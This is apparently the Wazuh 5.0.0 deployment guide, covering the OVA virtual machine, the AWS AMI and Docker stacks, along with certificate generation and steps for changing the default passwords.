  • Amazon Machine Images (AMI): This is a pre-built Amazon Machine Image (AMI) you can directly launch on an AWS cloud instance.

Containers

  • Deployment on Docker: Docker is a set of platform-as-a-service (PaaS) products that deliver software in packages called containers. Using Docker, you can install and configure the Wazuh deployment as a single-host architecture.

  • Deployment on Kubernetes: Kubernetes is an open-source system for automating deployment, scaling, and managing containerized applications. This deployment type uses Wazuh images from Docker and allows you to build the Wazuh environment.

Offline

  • Offline installation guide: Installing the solution offline involves downloading the Wazuh components to later install them on a system with no internet connection.

From sources

  • Installing the Wazuh server from sources: Installing Wazuh from sources means installing the Wazuh manager without using a package manager. You compile the source code and copy the binaries to your computer instead.

Note

To integrate Wazuh with Elastic or Splunk, refer to our Integrations guide: Elastic, OpenSearch, Splunk, Amazon Security Lake.

Installing the Wazuh agent

The Wazuh agent is a single and lightweight monitoring software. It is a multi-platform component that can be deployed to laptops, desktops, servers, cloud instances, containers, or virtual machines. It provides visibility into the endpoint security by collecting critical system and application records, inventory data, and detecting potential anomalies.

If the Wazuh central components are already installed in your environment, select your operating system below and follow the installation steps to deploy the agent on the endpoints.

From sources

  • Installing the Wazuh agent from sources: Installing Wazuh from sources means installing the Wazuh agent without using a package manager. You compile the source code and copy the binaries to your computer instead.

Orchestration tools

These alternatives guide you to install the Wazuh central components along with the single universal agent.

  • Deployment with Ansible: Ansible is an open source platform designed for automating tasks. Its deployment tool is used to deploy the Wazuh infrastructure on AWS. The Wazuh environment consists of the Wazuh central components and a Wazuh agent.

  • Deployment with Puppet: Puppet is an open-source software tool that gives you an automatic way to inspect, deliver, operate, and future-proof all of your software, no matter where it is executed. It is very simple to use and allows you to install and configure Wazuh easily.

Virtual machine (VM)

Wazuh provides a pre-built virtual machine image in Open Virtual Appliance (OVA) format. It includes the Amazon Linux 2023 operating system and the Wazuh central components.

  • Wazuh manager 5.0.0

  • Filebeat-OSS 7.10.2

  • Wazuh indexer 5.0.0

  • Wazuh dashboard 5.0.0

You can import the Wazuh virtual machine image to VirtualBox or other OVA-compatible virtualization systems. This VM runs only on 64-bit systems with x86_64/AMD64 architecture. It does not provide high availability or scalability out of the box; however, you can achieve these with a distributed deployment.

Download the virtual appliance (OVA).

OS                | Architecture                     | VM Format | Version | Package
Amazon Linux 2023 | 64-bit x86_64/AMD64 architecture | OVA       | 5.0.0   | wazuh-5.0.0.ova (sha512)

Hardware requirements

The following requirements have to be in place before the Wazuh VM can be imported into a host operating system:

  • The host operating system must be 64-bit with x86_64/AMD64 architecture.

  • Enable hardware virtualization in the host firmware.

  • Install a virtualization platform, such as VirtualBox, on the host system.

The Wazuh VM is configured with these specifications by default:

Component        | CPU (cores) | RAM (GB) | Storage (GB)
Wazuh v5.0.0 OVA | 4           | 8        | 50

The hardware configuration can be modified depending on the number of protected endpoints and indexed alert data. For more information about requirements, see Quickstart.

Import and access the virtual machine
  1. Import the wazuh-5.0.0.ova file to your virtualization platform.

  2. If you use VirtualBox, set the Graphics Controller to VMSVGA. Other controllers can freeze the VM window.

    1. Select the imported VM.

    2. Click Settings > Display.

    3. Switch from Basic to Expert mode at the top-left of the settings window.

    4. From the Graphics Controller dropdown, select the VMSVGA option.

  3. Start the VM.

  4. Log in using these credentials. You can log in from the virtualization platform console or connect via SSH.

    user: wazuh-user
    password: wazuh
    

    The SSH root user login is disabled. The wazuh-user has sudo privileges. To switch to root, execute the following command:

    sudo -i
    
Access the Wazuh dashboard

After starting the VM, access the Wazuh dashboard in a web browser using these credentials:

URL: https://<WAZUH_SERVER_IP>
user: admin
password: admin

It might take a few seconds to minutes for the Wazuh dashboard to complete initialization. You can find <WAZUH_SERVER_IP> by typing the following command in the VM:

ip a
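The ip a output lists the addresses assigned to the VM's interfaces. Once you know the address, you can also reach the VM over SSH using the wazuh-user credentials shown above, for example:

ssh wazuh-user@<WAZUH_SERVER_IP>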
Configuration files

All components in this virtual image are configured to work out of the box. However, all components can be fully customized. These are the configuration file locations:

  • Wazuh manager: /var/ossec/etc/ossec.conf

  • Wazuh indexer: /etc/wazuh-indexer/opensearch.yml

  • Filebeat-OSS: /etc/filebeat/filebeat.yml

  • Wazuh dashboard:

    • /etc/wazuh-dashboard/opensearch_dashboards.yml

    • /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml

VirtualBox time configuration

If you use VirtualBox, the VM might experience time skew when VirtualBox synchronizes the guest machine time. Follow the steps below to avoid this:

  1. Select the imported Wazuh VM.

  2. Click on Settings > System.

  3. Switch from Basic to Expert mode at the top-left of the settings window.

  4. Click on the Motherboard sub-tab.

  5. Enable the Hardware Clock in UTC Time option under Features.

Note

By default, the network interface type is set to Bridged Adapter. The VM attempts to obtain an IP address from the network DHCP server. Alternatively, you can set a static IP address by configuring the network files in Amazon Linux.

Once the virtual machine is imported and running, the next step is to deploy the Wazuh agents on the systems to be monitored.

Troubleshooting
VM fails to start on AMD processors with VMware

Issue:

  • After importing the Wazuh OVA into VMware Workstation on a host with an AMD processor, the VM fails to start with the error:

    The guest operating system has disabled the CPU. Power off or reset the virtual machine.
    

Workaround:

  1. Locate and edit the VM .vmx file after importing the OVA.

  2. Add the following lines to the end of the file to resolve compatibility issues between the VM and AMD processors.

    cpuid.0.eax = "0000:0000:0000:0000:0000:0000:0000:1011"
    cpuid.0.ebx = "0111:0101:0110:1110:0110:0101:0100:0111"
    cpuid.0.ecx = "0110:1100:0110:0101:0111:0100:0110:1110"
    cpuid.0.edx = "0100:1001:0110:0101:0110:1110:0110:1001"
    cpuid.1.eax = "0000:0000:0000:0001:0000:0110:0111:0001"
    cpuid.1.ebx = "0000:0010:0000:0001:0000:1000:0000:0000"
    cpuid.1.ecx = "1000:0010:1001:1000:0010:0010:0000:0011"
    cpuid.1.edx = "0000:0111:1000:1011:1111:1011:1111:1111"
    featureCompat.enable = "FALSE"
    
  3. Save the file and power on the VM.

Upgrading the VM

The virtual machine can be upgraded in the same way as a traditional installation. Follow the instructions on how to upgrade the Wazuh central components.

Amazon Machine Images (AMI)

Wazuh provides a pre-built Amazon Machine Image (AMI). An AMI is a ready-to-use template for creating virtual computing environments in Amazon Elastic Compute Cloud (Amazon EC2). The latest Wazuh AMI includes Amazon Linux 2023 and the Wazuh central components.

  • Wazuh manager 5.0.0

  • Filebeat-OSS 7.10.2

  • Wazuh indexer 5.0.0

  • Wazuh dashboard 5.0.0

Packages list

Distribution      | Architecture | VM Format | Latest version | Product page
Amazon Linux 2023 | 64-bit       | AWS AMI   | 5.0.0          | Wazuh All-In-One Deployment

Deployment alternatives

You can deploy a Wazuh instance in two ways. Launch the Wazuh All-In-One Deployment AMI directly from the AWS Marketplace or configure and deploy an instance using the AWS Management Console.

Note

Our Wazuh Consulting Service is also available in the AWS Marketplace. Check the Professional Service packages that Wazuh has to offer.

Launch an instance from the AWS Marketplace
  1. Go to Wazuh All-In-One Deployment in the AWS Marketplace, then click View purchase options.

  2. Review the information and the terms for the software. Click Subscribe to confirm subscribing to our product. You will receive an email notification that your offer has been accepted.

  3. Click Launch your software to continue your setup.

  4. Select the service Amazon EC2, Launch from EC2 console, and a Region.

  5. Click Launch from EC2 to take you to the AWS Management Console.

  6. Review your configuration, ensuring all settings are correct, before launching the software. Adapt the default configuration to your needs.

    1. When selecting the EC2 Instance Type, we recommend c5a.xlarge because it offers an ideal balance of high compute performance and cost-efficiency.

    2. To guarantee the correct operation, the Security Group must have the appropriate settings for your Wazuh instance. You can create a new security group by choosing Create security group. This new group will have the appropriate settings by default.

  7. Click Launch to generate the instance.

Once your instance is successfully launched and a few minutes have elapsed, you can access the Wazuh dashboard.

Deploy an instance using the AWS Management Console
  1. Select EC2 from your AWS Management Console dashboard.

  2. Click Launch instance.

  3. Click on Browse more AMIs.

  4. Search Wazuh All-In-One Deployment by Wazuh Inc under the AWS Marketplace AMIs tab, and click Select. This brings up a description of the Wazuh All-In-One Deployment with the option to either Subscribe on instance launch or Subscribe now.

  5. Select the instance type that best fits your needs. We recommend c5a.xlarge.

    You can use any of the following three key pair configuration alternatives:

    • Choose an existing key pair

    • Create a new key pair

    • Proceed without a key pair (Not recommended)

    You need to choose an existing key pair or create a new one to access the instance with SSH.

  6. When selecting the Security Group, ensure it has the appropriate settings for your Wazuh instance to guarantee correct operation. You can create a new security group by choosing Create security group. This new group has the appropriate settings by default. Check that the allowed ports and protocols match those required by Wazuh, and review the security measures for your instance. This establishes the Security Group (SG).

  7. Under the Size (GiB) column, set your instance's storage capacity, then click Next: Add Tags. We recommend 100 GiB gp3 or more.

  8. Review the instance configuration and click Launch instance.

After a few minutes, the instance will be ready. You can access the Wazuh dashboard.

Configuration files

All components included in this AMI are configured to work out-of-the-box without the need to modify any settings. However, all components can be fully customized. These are the configuration file locations:

  • Wazuh manager: /var/ossec/etc/ossec.conf

  • Wazuh indexer: /etc/wazuh-indexer/opensearch.yml

  • Filebeat-OSS: /etc/filebeat/filebeat.yml

  • Wazuh dashboard:

    • /etc/wazuh-dashboard/opensearch_dashboards.yml

    • /usr/share/wazuh-dashboard/data/wazuh/config/wazuh.yml

To learn more about configuring Wazuh, see the User manual.

Access the Wazuh dashboard

When the instance is launched, the user passwords are automatically changed to the instance ID with the first letter capitalized. For example: I-07f25f6afe4789342. This ensures that only the creator has access to the interface. This process can take an average of five minutes, depending on the type of instance. During this time, SSH access and Wazuh dashboard access are disabled.

Once the instance runs and the process to initialize passwords is complete, you can access the Wazuh dashboard with your credentials.

  • URL: https://<YOUR_INSTANCE_IP>

  • Username: admin

  • Password: <YOUR_INSTANCE_ID>

Note

The password is the instance ID with the first letter capitalized. For example, if the instance ID is: i-07f25f6afe4789342, the default password will be I-07f25f6afe4789342.

Warning

The passwords for the Wazuh server API users wazuh and wazuh-wui are the same as those for the admin user. We highly recommend changing the default passwords on the first SSH access. To perform this action, refer to the Password management section.

Security considerations about SSH
  • Root login over SSH is disabled; the instance can only be accessed as the wazuh-user user.

  • The instance can only be accessed with the key pair selected or created when the instance was launched.

  • Download the key pair generated or stored in AWS, then run the following command to connect to the instance.

    # ssh -i "<KEY_PAIR_NAME>" wazuh-user@<YOUR_INSTANCE_IP>
    
  • Access during the initial password change is disabled to prevent potential problems. This process might take a few minutes to complete. Any access attempt before completion shows: wazuh-user@<INSTANCE_IP>: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

Next steps

The Wazuh AMI is now ready and you can proceed with deploying the Wazuh agents on the systems to be monitored.

Upgrading the AMI

Follow the instructions on how to upgrade the Wazuh central components.

Deployment on Docker

Docker is an open source platform that simplifies building, delivering, and running applications in lightweight, portable containers. These containers bundle their application with all its dependencies, such as code, system tools, system libraries, and settings. Docker enables the separation of applications from the underlying infrastructure and ensures they run consistently across any environment, whether in the cloud or on-premises.

Wazuh provides official Docker images that you can use to streamline deployment. These include images for the Wazuh manager, the Wazuh indexer, the Wazuh dashboard, and the Wazuh agent.

You can find all available Wazuh Docker images on Docker Hub.

Wazuh Docker deployment

Wazuh consists of a multi-platform Wazuh agent and three central components: the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. Refer to the Wazuh components documentation for more information.

Deployment options

Wazuh supports the deployment of its central components and agent on Docker.

  • Single-node stack: This stack deploys one of each Wazuh central component as a separate container. It includes:

    • Wazuh indexer container: Stores and indexes security data collected by the Wazuh manager.

    • Wazuh manager container: Analyzes collected security events, applies detection rules, and manages Wazuh agents.

    • Wazuh dashboard container: Centralized web interface for monitoring, searching, and managing Wazuh.

    It provides persistent storage and configurable certificates for secure communication.

  • Multi-node stack: This stack deploys the Wazuh central components across multiple containers for scalability and high availability. It includes:

    • Three Wazuh indexer containers: Work together in a cluster to store and replicate indexed data, ensuring scalability and fault tolerance.

    • Two Wazuh manager containers: One master and one worker node. The master coordinates agent management and rule updates, while the worker provides redundancy and load distribution.

    • One Wazuh dashboard container.

    • One Nginx proxy container: This provides a single secure entry point that load balances traffic between multiple Wazuh manager nodes for high availability. The Nginx container acts as a reverse proxy, distributing incoming requests across the available manager nodes and providing SSL termination for secure communication.

This deployment stack provides persistent storage, secure communication, and high availability.

  • Wazuh agent: This deploys the Wazuh agent as a container on your Docker host.

Prerequisites

Before deploying Wazuh on Docker, ensure your environment meets the following requirements.

System requirements
Single-node stack deployment
  • Operating system: Linux or Windows

  • Architecture: AMD64 (x86_64) or ARM64 (AARCH64)

  • CPU: At least 4 cores

  • Memory: At least 8 GB of RAM for the Docker host

  • Disk space: At least 50 GB storage for Docker images and data volumes

Multi-node stack deployment
  • Operating system: Linux or Windows

  • Architecture: AMD64 or ARM64

  • CPU: At least 4 cores

  • Memory: At least 16 GB for the Docker host

  • Disk space: At least 100 GB storage for Docker images and data volumes

Wazuh agent deployment
  • Operating system: Linux or Windows

  • Architecture: AMD64

  • CPU: At least 2 cores

  • Memory: At least 1 GB of RAM for the Docker host

  • Disk space: At least 10 GB storage for Docker images and logs

Required software
  • Docker Engine / Docker Desktop: Use the latest stable version.

    • Linux: Docker Engine

    • Windows: Docker Desktop (requires WSL 2)

  • Docker Compose: Latest stable version (included with Docker Desktop on Windows; install separately on Linux if needed).

  • Git: For cloning the Wazuh Docker repository.

Docker host requirements

You need to configure your Docker host to run Wazuh correctly on any system that uses a Linux kernel. This includes native Linux distributions and Windows with WSL 2 (Windows Subsystem for Linux version 2).

  1. Set max_map_count to 262144 on your Docker host. The Wazuh indexer creates many virtual memory areas (VMAs), so the kernel must allow more than the Linux default limit of 65530. A VMA is a region of memory that lets applications like the Wazuh indexer access files directly from disk as if they were in RAM.

    Note

    On Windows systems using WSL 2, run this command within the WSL 2 environment.

    # sysctl -w vm.max_map_count=262144
    

    Warning

    If you don’t set vm.max_map_count to at least 262144, the Wazuh indexer might fail due to limited virtual memory mapping. This value lets the indexer map more files and index segments to memory, preventing errors or crashes.

  2. On native Linux systems, add your user to the docker group if you want to run Docker without root privileges:

    # usermod -aG docker <USER>
    

    Replace <USER> with your username. Log out and back in for the change to take effect.
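The sysctl command in step 1 applies only to the running kernel. To make the setting persist across reboots on a native Linux Docker host, one common approach is to add it to /etc/sysctl.conf and reload the configuration, as sketched below; on Windows with WSL 2, apply the setting inside the WSL environment as noted above.

# echo "vm.max_map_count=262144" >> /etc/sysctl.conf
# sysctl -p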

Exposed ports

The following ports are exposed when the Wazuh central components are deployed.

Port  | Component
1514  | Wazuh TCP
1515  | Wazuh TCP
514   | Wazuh UDP
55000 | Wazuh server API
9200  | Wazuh indexer API
443   | Wazuh dashboard HTTPS
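After deployment, you can quickly check which of these ports are listening on the Docker host. This is a generic check using ss from the iproute2 package; adjust the port list as needed.

# ss -tulnp | grep -E ':(1514|1515|514|55000|9200|443)\b'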

Wazuh central components

Below are the steps for deploying the Wazuh central components in single-node and multi-node stacks.

Warning

Do not run the single-node and multi-node stacks at the same time on the same Docker host. Both stacks use overlapping resources (such as container names, ports, and volumes), which can lead to conflicts, unexpected behavior, or data corruption.

Single-node stack deployment

Follow the steps below to deploy the Wazuh central components in a single-node stack.

Note

All deployment commands provided apply to both Windows and Linux environments.

Cloning the repository
  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the single-node directory to execute all the following commands.

    # cd wazuh-docker/single-node/
    
Certificate generation

You must provide certificates for each node to secure communication between them in the Wazuh stack. You have two alternatives:

  • Wazuh self-signed certificates

  • Your own certificates

To generate self-signed certificates for each node of the stack, use the wazuh-certs-generator Docker image.

  1. Optional: Add the following to the generate-indexer-certs.yml file if your system uses a proxy. If not, skip this step. Replace <YOUR_PROXY_ADDRESS_OR_DNS> with your proxy information.

    # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
    services:
      generator:
        image: wazuh/wazuh-certs-generator:0.0.4
        hostname: wazuh-certs-generator
        volumes:
          - ./config/wazuh_indexer_ssl_certs/:/certificates/
          - ./config/certs.yml:/config/certs.yml
        environment:
          - HTTP_PROXY=<YOUR_PROXY_ADDRESS_OR_DNS>
    
  2. Run the following command to generate the desired certificates:

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

The generated certificates will be stored in the wazuh-docker/single-node/config/wazuh_indexer_ssl_certs directory.

Deployment
  1. Start the Wazuh Docker deployment using the docker compose command:

    # docker compose up -d
    

Note

Docker does not dynamically reload the configuration. After changing a component's configuration, you need to restart the stack.

Accessing the Wazuh dashboard

After deploying the single-node stack, you can access the Wazuh dashboard using your Docker host's IP address or localhost.

https://<DOCKER_HOST_IP>

Note

If you use a self-signed certificate, your browser will display a warning that it cannot verify the certificate's authenticity.

This is the default username and password to access the Wazuh dashboard:

  • Username: admin

  • Password: SecretPassword

Refer to the changing the default password of Wazuh users section to learn more about additional security.

Note

To determine when the Wazuh indexer is up, the Wazuh dashboard container uses curl to repeatedly send queries to the Wazuh indexer API (port 9200). You can expect to see several Failed to connect to Wazuh indexer port 9200 log messages or Wazuh dashboard server is not ready yet until the Wazuh indexer is started. Then the setup process continues normally. It takes about one minute for the Wazuh indexer to start up. You can find the default Wazuh indexer credentials in the docker-compose.yml file.
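While waiting, you can follow the dashboard container's startup logs from the single-node directory. The wazuh.dashboard service name below matches the Compose files used in this guide.

# docker compose logs -f wazuh.dashboard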

Multi-node stack deployment

Follow the steps below to deploy the Wazuh central components in a multi-node stack.

Note

All deployment commands provided apply to both Windows and Linux environments.

Cloning the repository
  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the multi-node directory to execute all the following commands.

    # cd wazuh-docker/multi-node/
    
Certificate generation

You must provide certificates for each node to secure communication between them in the Wazuh stack. You have two alternatives:

  • Wazuh self-signed certificates

  • Your own certificates

To generate self-signed certificates for each node of the stack, use the wazuh-certs-generator Docker image.

  1. Optional: Add the following to the generate-indexer-certs.yml file if your system uses a proxy. If not, skip this step. Replace <YOUR_PROXY_ADDRESS_OR_DNS> with your proxy information.

    # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
    services:
      generator:
        image: wazuh/wazuh-certs-generator:0.0.4
        hostname: wazuh-certs-generator
        volumes:
          - ./config/wazuh_indexer_ssl_certs/:/certificates/
          - ./config/certs.yml:/config/certs.yml
        environment:
          - HTTP_PROXY=<YOUR_PROXY_ADDRESS_OR_DNS>
    
  2. Run the following command to generate the desired certificates:

    # docker compose -f generate-indexer-certs.yml run --rm generator
    

The generated certificates will be stored in the wazuh-docker/multi-node/config/wazuh_indexer_ssl_certs directory.

Deployment
  1. Start the Wazuh Docker deployment using the docker compose command:

    # docker compose up -d
    

Note

Docker does not dynamically reload the configuration. After changing a component's configuration, you need to restart the stack.

Accessing the Wazuh dashboard

After deploying the multi-node stack, you can access the Wazuh dashboard using your Docker host's IP address or localhost.

https://<DOCKER_HOST_IP>

Note

If you use a self-signed certificate, your browser will display a warning that it cannot verify the certificate's authenticity.

This is the default username and password to access the Wazuh dashboard:

  • Username: admin

  • Password: SecretPassword

Refer to the changing the default password of Wazuh users section to learn more about additional security.

Note

To determine when the Wazuh indexer is up, the Wazuh dashboard container uses curl to repeatedly send queries to the Wazuh indexer API (port 9200). You can expect to see several Failed to connect to Wazuh indexer port 9200 log messages or Wazuh dashboard server is not ready yet until the Wazuh indexer is started. Then the setup process continues normally. It takes about one minute for the Wazuh indexer to start up. You can find the default Wazuh indexer credentials in the docker-compose.yml file.

Wazuh agent

Running the Wazuh agent in a Docker container provides a lightweight option for integrations and for collecting logs via syslog, without installing the agent directly on a host. However, when deployed this way, the containerized agent cannot directly access or monitor the host system.

Deployment

Follow these steps to deploy the Wazuh agent using Docker.

  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the wazuh-docker/wazuh-agent/ directory within your repository:

    # cd wazuh-docker/wazuh-agent
    
  3. Edit the docker-compose.yml file. Replace <WAZUH_MANAGER_IP> with the IP address of your Wazuh manager. Locate the environment section for the agent service and update it:

    # Wazuh App Copyright (C) 2017, Wazuh Inc. (License GPLv2)
    services:
      wazuh.agent:
        image: wazuh/wazuh-agent:5.0.0
        restart: always
        environment:
          - WAZUH_MANAGER_SERVER=<WAZUH_MANAGER_IP>
        volumes:
          - ./config/wazuh-agent-conf:/wazuh-config-mount/etc/ossec.conf
    
  4. Start the Wazuh agent deployment using docker compose:

    # docker compose up -d
    
  5. Verify from the Wazuh dashboard that the Wazuh agent deployment was successful. Navigate to Agents management > Summary; the Wazuh agent container should appear as active. You can also check the container's logs from the command line, as shown below.
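The following command, run from the wazuh-docker/wazuh-agent directory, follows the agent container's logs; the wazuh.agent service name comes from the Compose file shown above.

# docker compose logs -f wazuh.agent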

Changing the default password of Wazuh users

We recommend changing the default Wazuh users' passwords to improve security.

There are two types of users in Wazuh Docker environments: Wazuh indexer users and Wazuh server API users.

Follow the steps below to change the password of these Wazuh users.

Note

Depending on your Wazuh Docker stack, you must run the commands from the wazuh-docker/single-node or wazuh-docker/multi-node directory.

Wazuh indexer user

The Wazuh indexer has the admin and kibanaserver users by default. You can access the Wazuh dashboard using either the admin or kibanaserver user credentials.

To change these credentials, complete the steps in the following subsections.

Warning

  • You can only change one user's password at a time.

  • If you have custom users, add them to the config/wazuh_indexer/internal_users.yml file in the deployment model directory. Otherwise, executing this procedure deletes them.

Logging out of your Wazuh dashboard

You must log out of your Wazuh dashboard before starting the password change process. If you don't, persistent session cookies will cause errors when accessing Wazuh after changing user passwords.

Setting the new password in the Docker Compose file

Note

If your password contains the $ character, you must escape it by doubling it. For example, to set the password Secret$Password in the docker-compose.yml file, write it as Secret$$Password.

  1. Open the docker-compose.yml file. Replace all occurrences of the old password with the new one. For example, for a single-node stack:

    ...
    services:
      wazuh.manager:
        ...
        environment:
          - INDEXER_URL=https://wazuh.indexer:9200
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - FILEBEAT_SSL_VERIFICATION_MODE=full
          - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem
          - SSL_CERTIFICATE=/etc/ssl/filebeat.pem
          - SSL_KEY=/etc/ssl/filebeat.key
          - API_USERNAME=wazuh-wui
          - API_PASSWORD=MyS3cr37P450r.*-
      wazuh.indexer:
        ...
        environment:
          - "OPENSEARCH_JAVA_OPTS=-Xms1024m -Xmx1024m"
      wazuh.dashboard:
        ...
        environment:
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - WAZUH_API_URL=https://wazuh.manager
          - DASHBOARD_USERNAME=kibanaserver
          - DASHBOARD_PASSWORD=kibanaserver
          - API_USERNAME=wazuh-wui
          - API_PASSWORD=MyS3cr37P450r.*-
    ...
    
Setting a new hash

Follow the steps below to generate and set a new password hash for your Wazuh users.

  1. Stop the stack if it's running:

    # docker compose down
    
  2. Run this command to generate the hash for your new password:

    # docker run --rm -ti wazuh/wazuh-indexer:5.0.0 bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/hash.sh
    

    Once the container launches, input the new password and press Enter.

  3. Copy the generated hash.

  4. Open the config/wazuh_indexer/internal_users.yml file. Locate the block for the user whose password you want to change.

  5. Replace <NEW_HASH> with your hash values.

    ...
    
    admin:
      hash: "<NEW_HASH>"
      reserved: true
      backend_roles:
      - "admin"
      description: "Demo admin user"
    
    ...
    

    Save the changes.

Applying the changes

After updating the docker-compose.yml file, restart the Wazuh Docker stack and reapply the settings using the securityadmin.sh tool.

  1. Start the deployment stack.

    # docker compose up -d
    
  2. Run docker ps and note the name of the first Wazuh indexer container. For example, single-node-wazuh.indexer-1, or multi-node-wazuh1.indexer-1.

  3. Run docker exec -it <WAZUH_INDEXER_CONTAINER_NAME> bash to access the container. Replace <WAZUH_INDEXER_CONTAINER_NAME> with the Wazuh indexer container name. For example, use single-node-wazuh.indexer-1 for the single-node stack and multi-node-wazuh1.indexer-1 for the multi-node stack:

    # docker exec -it single-node-wazuh.indexer-1 bash
    
  4. Set the following variables:

    export INSTALLATION_DIR=/usr/share/wazuh-indexer
    export CONFIG_DIR=$INSTALLATION_DIR/config
    CACERT=$CONFIG_DIR/certs/root-ca.pem
    KEY=$CONFIG_DIR/certs/admin-key.pem
    CERT=$CONFIG_DIR/certs/admin.pem
    export JAVA_HOME=/usr/share/wazuh-indexer/jdk
    
  5. Wait for the Wazuh indexer to initialize properly. The waiting time can vary from one to five minutes. It depends on the size of the cluster, the assigned resources, and the network speed. Then, run the securityadmin.sh script to apply all changes.

    $ bash /usr/share/wazuh-indexer/plugins/opensearch-security/tools/securityadmin.sh -cd $CONFIG_DIR/opensearch-security/ -nhnv -cacert  $CACERT -cert $CERT -key $KEY -p 9200 -icl
    
  6. Exit the Wazuh indexer container. Refresh the Wazuh dashboard and log in with the new credentials.

Wazuh server API users

The wazuh-wui user is the default user for connecting to the Wazuh server API. Follow these steps to change the password.

Warning

The password for Wazuh server API users must be between 8 and 64 characters long and contain at least one uppercase and lowercase letter, number, and symbol. The Wazuh manager service will fail to start if these requirements are unmet.

  1. Open the config/wazuh_dashboard/wazuh.yml file and modify the value of the password parameter.

    ...
    hosts:
      - 1513629884013:
          url: "https://wazuh.manager"
          port: 55000
          username: wazuh-wui
          password: "MyS3cr37P450r.*-"
          run_as: false
    ...
    
  2. Open the docker-compose.yml file. Replace all occurrences of the old password with the new one.

    ...
    services:
      wazuh.manager:
        ...
        environment:
          - INDEXER_URL=https://wazuh.indexer:9200
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - FILEBEAT_SSL_VERIFICATION_MODE=full
          - SSL_CERTIFICATE_AUTHORITIES=/etc/ssl/root-ca.pem
          - SSL_CERTIFICATE=/etc/ssl/filebeat.pem
          - SSL_KEY=/etc/ssl/filebeat.key
          - API_USERNAME=wazuh-wui
          - API_PASSWORD=MyS3cr37P450r.*-
      wazuh.dashboard:
        ...
        environment:
          - INDEXER_USERNAME=admin
          - INDEXER_PASSWORD=SecretPassword
          - WAZUH_API_URL=https://wazuh.manager
          - DASHBOARD_USERNAME=kibanaserver
          - DASHBOARD_PASSWORD=kibanaserver
          - API_USERNAME=wazuh-wui
          - API_PASSWORD=MyS3cr37P450r.*-
    ...
    
  3. Recreate the Wazuh containers:

    # docker compose down
    # docker compose up -d
    

Refer to logging in to the Wazuh server API via the command line to learn more.

Building Docker images locally

You can modify and build Docker images for the Wazuh central components (manager, indexer, and dashboard) and the Wazuh agent.

  1. Clone the Wazuh Docker repository to your system:

    # git clone https://github.com/wazuh/wazuh-docker.git -b v5.0.0
    
  2. Navigate to the build-docker-images directory:

    # cd wazuh-docker/build-docker-images
    
  3. Run the build script:

    # ./build-images.sh
    

This process builds Docker images for all Wazuh components on your local system.
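To confirm the build finished, you can list the resulting images on your local system:

# docker images | grep wazuh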

Wazuh Docker utilities

After deploying Wazuh with Docker, you can perform several tasks to manage and customize your installation. Wazuh components are deployed as separate containers built from their corresponding Docker image. You can access these containers using the service names defined in your docker-compose.yml file, which are specific to your deployment type.

Access to services and containers

This section explains how to interact with your Wazuh deployment by accessing service logs and shell instances of running containers.

  1. Access the Wazuh dashboard using the Docker host IP address.

  2. Enroll agents through the Wazuh agent Docker deployment or the standard Wazuh agent enrollment process. Use the Docker host address as the Wazuh manager address.

  3. List the containers in the directory where the Wazuh docker-compose.yml file is located:

    # docker compose ps
    
    NAME                            COMMAND                  SERVICE             STATUS              PORTS
    single-node-wazuh.dashboard-1   "/entrypoint.sh"         wazuh.dashboard     running             443/tcp, 0.0.0.0:443->5601/tcp
    single-node-wazuh.indexer-1     "/entrypoint.sh open…"   wazuh.indexer       running             0.0.0.0:9200->9200/tcp
    single-node-wazuh.manager-1     "/init"                  wazuh.manager       running             0.0.0.0:1514-1515->1514-1515/tcp, 0.0.0.0:514->514/udp, 0.0.0.0:55000->55000/tcp, 1516/tcp
    
  4. Run the command below from the directory where the docker-compose.yml file is located to open a shell inside the container:

    # docker compose exec <SERVICE> bash
    
Wazuh service data volumes

You can set Wazuh configuration and log files to exist outside their containers on the host system. This allows the files to persist after containers are removed, and you can provision custom configuration files to your containers.

Listing existing volumes

Run the following to see the persistent volumes on your Docker host:

# docker volume ls
DRIVER    VOLUME NAME
local     single-node_wazuh_api_configuration

You can also view these volumes in the volumes section directly from the docker-compose.yml file.

Adding a custom volume

You need multiple volumes to ensure persistence for the Wazuh server, Wazuh indexer, and Wazuh dashboard containers. Review the volumes section in your docker-compose.yml file and modify it to include your custom volumes:

services:
  wazuh.manager:
    . . .
    volumes:
      - wazuh_api_configuration:/var/ossec/api/configuration
    . . .
volumes:
  wazuh_api_configuration:
Custom commands and scripts

Run the command below to execute commands inside the containers. We use the Wazuh manager single-node-wazuh.manager-1 container in this example:

# docker exec -it single-node-wazuh.manager-1 bash

Every change made in this shell persists because of the data volumes.

Note

The actions you can perform inside the containers are limited.

Modifying the Wazuh configuration file

To customize the Wazuh configuration file /var/ossec/etc/ossec.conf, modify the appropriate configuration file on the Docker host according to your business needs. These local files are mounted into the containers at runtime, allowing your custom settings to persist across container restarts or rebuilds.

  1. Run the following command in your deployment directory to stop the running containers:

    # docker compose down
    
  2. The following are the locations of the Wazuh configuration files on the Docker host that you can modify:

    wazuh-docker/single-node/config/wazuh_cluster/wazuh_manager.conf

    Save the changes made in the configuration files.

  3. Restart the stack:

    # docker compose up -d
    

These files are mounted into the container at runtime (wazuh-config-mount/etc/ossec.conf), ensuring your changes take effect when the containers start.

Tuning Wazuh services

Tuning the Wazuh indexer and dashboard is optional. You can apply custom configurations only if you need to adjust performance, customize the dashboard interface, or override default settings.

  • The Wazuh indexer reads its configuration from the file(s) in the config/wazuh_indexer/ directory in your respective deployment stack. Edit the appropriate configuration file(s) with your desired parameters, and ensure any changes made are properly mapped in your docker-compose.yml so the container loads the updated configuration.

